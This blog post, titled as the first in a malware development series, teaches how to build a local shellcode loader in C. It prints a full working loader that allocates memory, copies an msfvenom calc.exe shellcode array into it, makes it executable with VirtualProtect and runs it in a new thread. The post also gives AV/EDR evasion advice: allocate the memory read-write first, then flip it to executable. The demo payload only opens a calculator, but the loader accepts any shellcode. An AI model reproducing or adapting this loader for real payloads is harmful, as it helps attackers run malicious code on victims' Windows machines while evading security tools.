0x00 - Simple Shellcode Loader with C

1273 words

6 minutes

0x00 - Simple Shellcode Loader with C

2025-11-15

Malware Development

Malware

/

Shellcode

/

Red Team

/

AV Bypass

In this module, we’re gonna write a simple shellcode loader also known as local shellcode injection using C and Win32 API. If I get enough free time, I’ll continue this as a malware development series. So let’s start with a basic one.

To load our shellcode (from msfvenom), we’re gonna need these window APIs.

VirtualAlloc - Allocate memory for our shellcode
RtlMoveMemory - Move our shellcode into allocated memory
VirtualProtect - To change memory region to as a executable
CreateThread - Create a thread to execute our shellcode
WaitForSingleObject - Wait until thread exection finished.

What is Win32 API?#

For those who doesn’t know yet what Win32 API is, Win32 API is the set of low level windows functions that let the software control things like windows, files, memory, and devices. It’s how programs interact with the windows operating system behind the scenes.

Before we get started, let’s review the code first to get clear vision.

1
#include <windows.h>
2
#include <stdio.h>
3

4
// calc.exe shellcode from msfvenom
5
unsigned char shellcode[] = {
6
    0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00, 0x41, 0x51,
7
    0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xD2, 0x65, 0x48, 0x8B, 0x52,
8
    0x60, 0x48, 0x8B, 0x52, 0x18, 0x48, 0x8B, 0x52, 0x20, 0x48, 0x8B, 0x72,
9
    0x50, 0x48, 0x0F, 0xB7, 0x4A, 0x4A, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
10
    0xAC, 0x3C, 0x61, 0x7C, 0x02, 0x2C, 0x20, 0x41, 0xC1, 0xC9, 0x0D, 0x41,
11
    0x01, 0xC1, 0xE2, 0xED, 0x52, 0x41, 0x51, 0x48, 0x8B, 0x52, 0x20, 0x8B,
12
    0x42, 0x3C, 0x48, 0x01, 0xD0, 0x8B, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48,
13
    0x85, 0xC0, 0x74, 0x67, 0x48, 0x01, 0xD0, 0x50, 0x8B, 0x48, 0x18, 0x44,
14
    0x8B, 0x40, 0x20, 0x49, 0x01, 0xD0, 0xE3, 0x56, 0x48, 0xFF, 0xC9, 0x41,
15
    0x8B, 0x34, 0x88, 0x48, 0x01, 0xD6, 0x4D, 0x31, 0xC9, 0x48, 0x31, 0xC0,
16
    0xAC, 0x41, 0xC1, 0xC9, 0x0D, 0x41, 0x01, 0xC1, 0x38, 0xE0, 0x75, 0xF1,
17
    0x4C, 0x03, 0x4C, 0x24, 0x08, 0x45, 0x39, 0xD1, 0x75, 0xD8, 0x58, 0x44,
18
    0x8B, 0x40, 0x24, 0x49, 0x01, 0xD0, 0x66, 0x41, 0x8B, 0x0C, 0x48, 0x44,
19
    0x8B, 0x40, 0x1C, 0x49, 0x01, 0xD0, 0x41, 0x8B, 0x04, 0x88, 0x48, 0x01,
20
    0xD0, 0x41, 0x58, 0x41, 0x58, 0x5E, 0x59, 0x5A, 0x41, 0x58, 0x41, 0x59,
21
    0x41, 0x5A, 0x48, 0x83, 0xEC, 0x20, 0x41, 0x52, 0xFF, 0xE0, 0x58, 0x41,
22
    0x59, 0x5A, 0x48, 0x8B, 0x12, 0xE9, 0x57, 0xFF, 0xFF, 0xFF, 0x5D, 0x48,
23
    0xBA, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8D, 0x8D,
24
    0x01, 0x01, 0x00, 0x00, 0x41, 0xBA, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5,
25
    0xBB, 0xE0, 0x1D, 0x2A, 0x0A, 0x41, 0xBA, 0xA6, 0x95, 0xBD, 0x9D, 0xFF,
26
    0xD5, 0x48, 0x83, 0xC4, 0x28, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0,
27
    0x75, 0x05, 0xBB, 0x47, 0x13, 0x72, 0x6F, 0x6A, 0x00, 0x59, 0x41, 0x89,
28
    0xDA, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x00
29
};
30

31
int main() {
32
    SIZE_T shellcodeSize = sizeof(shellcode);
33
    printf("[+] Shellcode size: %zu bytes\n", shellcodeSize);
34

35
    // allocating memory
36
    PVOID pShellcodeAddress = VirtualAlloc(NULL,shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
37
    if (pShellcodeAddress == NULL) {
38
        printf("[-] Failed to allocate memory\n");
39
        return -1;
40
    }
41
    printf("[+] Memory allocated at: 0x%p\n", pShellcodeAddress);
42

43
    // copy shellcode to executable memory
44
    // we can use a simple memcpy here
45
    // memcpy(pShellcodeAddress, shellcode, shellcodeSize);
46

47
    RtlMoveMemory(pShellcodeAddress, shellcode, shellcodeSize);
48
    printf("[+] Copied shellcode to: 0x%p\n", pShellcodeAddress);
49

50
    printf("[+] Changed memory region to: PAGE_EXECUTE_READWRITE\n");
51
    DWORD dwOldProtection = NULL;
52
    if (!VirtualProtect(pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READWRITE, &dwOldProtection)) {
53
        printf("[!] VirtualProtect Failed With Error : %d \n", GetLastError());
54
        return -1;
55
    }
56

57
    printf("[*] Creating new thread\n");
58
    // create a new thread to execute the shellcode
59
    HANDLE hThread = CreateThread(NULL, 0, pShellcodeAddress,NULL,0,NULL);
60
    if (hThread == NULL) {
61
        printf("[!] CreateThread Failed With Error : %d \n", GetLastError());
62
        return -1;
63
    }
64
    // wait for the thread to finish execution
65
    WaitForSingleObject(hThread, INFINITE);
66

67
    // cleaning up
68
    CloseHandle(hThread);
69
    VirtualFree(pShellcodeAddress, 0, MEM_RELEASE);
70
    printf("[+] Done");
71
    return 0;
72
}

Allocating Memory#

The first thing we need to do is to allocate memory region for our shellcode with VirtualAlloc. If you don’t know what VirtualAlloc does and what kind of parameters its has, we can search in google like VirtualAlloc msdn. So it will show the whole microsoft documentation of that related API. For example:

1
LPVOID VirtualAlloc(
2
  [in, optional] LPVOID lpAddress,
3
  [in]           SIZE_T dwSize,
4
  [in]           DWORD  flAllocationType,
5
  [in]           DWORD  flProtect
6
);

Before we look at the parameters, you’ll see tags like [in] or [out]. [in] means we must provide a value for that parameter. [out] means the function will give us a value back through that parameter.

And you might notice some of window data types throughout the series such as LPVOID, PVOID, SIZE_T, BOOL, HANDLE and many more. We just have to declare base on the type of our variables. You can learn it more from MSDN page.

That’s why we used pShellcodeAddress as a PVOID or LPVOID and shellcodeSize as a SIZE_T in here.

lpAddress is the starting address where we want our memory block to begin. We used NULL, so windows will pick the location automatically by itself.
dwSize is the size of our shellcode that we declared in line number 9.
For flAllocationType, we used MEM_COMMIT | MEM_RESERVE. So what are these? You can also read details in MSDN page. For now, MEM_RESERVE is like make a reservation a memory space to use later. MEM_COMMIT is like I’m gonna use that reserved space. To be clear :
- MEM_RESERVE = “I’ll need this space later”
- MEM_COMMIT = “I’m putting my stuff here now”
- MEM_COMMIT | MEM_RESERVE = “I need space with stuff right now”
flProtect is like what we are allowed to do with that memory region. For example, can we have read access, write access or execute it as a code? It has multiple values in MSDN page like
- PAGE_EXECUTE
- PAGE_EXECUTE_READ
- PAGE_EXECUTE_READWRITE
- PAGE_READONLY
- And more

We could simply just pass PAGE_EXECUTE_READWRITE to VirtualAlloc, but doing this is a major red flag for AV/EDR. For best practice as a malware developer, we allocate the memory as PAGE_READWRITE first, and then change it to executable using VirtualProtect.

So, If our function succeeds, the return value is the base address of the allocated region of pages. (How to know? from MSDN page for sure). If NULL, it failed to allocate. We can handle the error like this:

1
if (pShellcodeAddress == NULL) {
2
    printf("\t[!] VirtualAlloc Failed With Error : %d \n", GetLastError());
3
  return FALSE;
4
}
5

6
// we can also use a simple memcpy here
7
// memcpy(pShellcodeAddress, shellcode, shellcodeSize);

Moving Shellcode#

Now that we have allocated a memory region for our shellcode, the next step is to copy the shellcode into that buffer using RtlMoveMemory.

Syntax from MSDN

1
VOID RtlMoveMemory(
2
  _Out_       VOID UNALIGNED *Destination,
3
  _In_  const VOID UNALIGNED *Source,
4
  _In_        SIZE_T         Length
5
);

Destination is the address returned by VirtualAlloc. Source will be our shellcode and Length is the total size of the shellcode.

1
RtlMoveMemory(pShellcodeAddress, shellcode, shellcodeSize);

After moving the shellcode, we need to change the memory region to be executable using VirtualProtect.

Syntax from MSDN

1
BOOL VirtualProtect(
2
  [in]  LPVOID lpAddress,
3
  [in]  SIZE_T dwSize,
4
  [in]  DWORD  flNewProtect,
5
  [out] PDWORD lpflOldProtect
6
);

As you can see lpflOldProtect is [out]. This is required because VirtualProtect must return the previous memory protection for that region. If the function succeed, the return value will be nonzero.

1
DWORD dwOldProtection = NULL;
2

3
if (!VirtualProtect(pShellcodeAddress, shellcodeSize, PAGE_EXECUTE_READWRITE, &dwOldProtection)) {
4
    printf("[!] VirtualProtect Failed With Error : %d \n", GetLastError());
5
    return -1;
6
}

Then we need to create a new thread to execute the shellcode. In this case, we’re going to use CreateThread API to create a thread.

1
HANDLE CreateThread(
2
  [in, optional]  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
3
  [in]            SIZE_T                  dwStackSize,
4
  [in]            LPTHREAD_START_ROUTINE  lpStartAddress,
5
  [in, optional]  __drv_aliasesMem LPVOID lpParameter,
6
  [in]            DWORD                   dwCreationFlags,
7
  [out, optional] LPDWORD                 lpThreadId
8
);

We will use our pShellcodeAddress as the lpStartAddress for the new thread and the other parameters can be set to NULL.

1
HANDLE hThread = CreateThread(NULL, 0, pShellcodeAddress,NULL,0,NULL);
2

3
if (hThread == NULL) {
4
    printf("\t[!] CreateThread Failed With Error : %d \n", GetLastError());
5
  return FALSE;
6
}
7

8
WaitForSingleObject(hThread, INFINITE);

WaitForSingleObject is to wait the thread to finish execution.

Deallocating Memory#

Now the last things to do is to clean up the allocated memory using VirtualFree.

1
CloseHandle(hThread);
2
VirtualFree(pShellcodeAddress, 0, MEM_RELEASE);

So let’s just run our code in visual studio and you can see it will pop up calc.exe.

0x00 - Simple Shellcode Loader with C

https://k0shane.github.io/posts/maldev/0x0-basic-shellcode-injection/

Author

k0shane

Published at

2025-11-15

License

SHANE

0x01 - Process Injection Part I

SSRF to S3 Bucket Compromised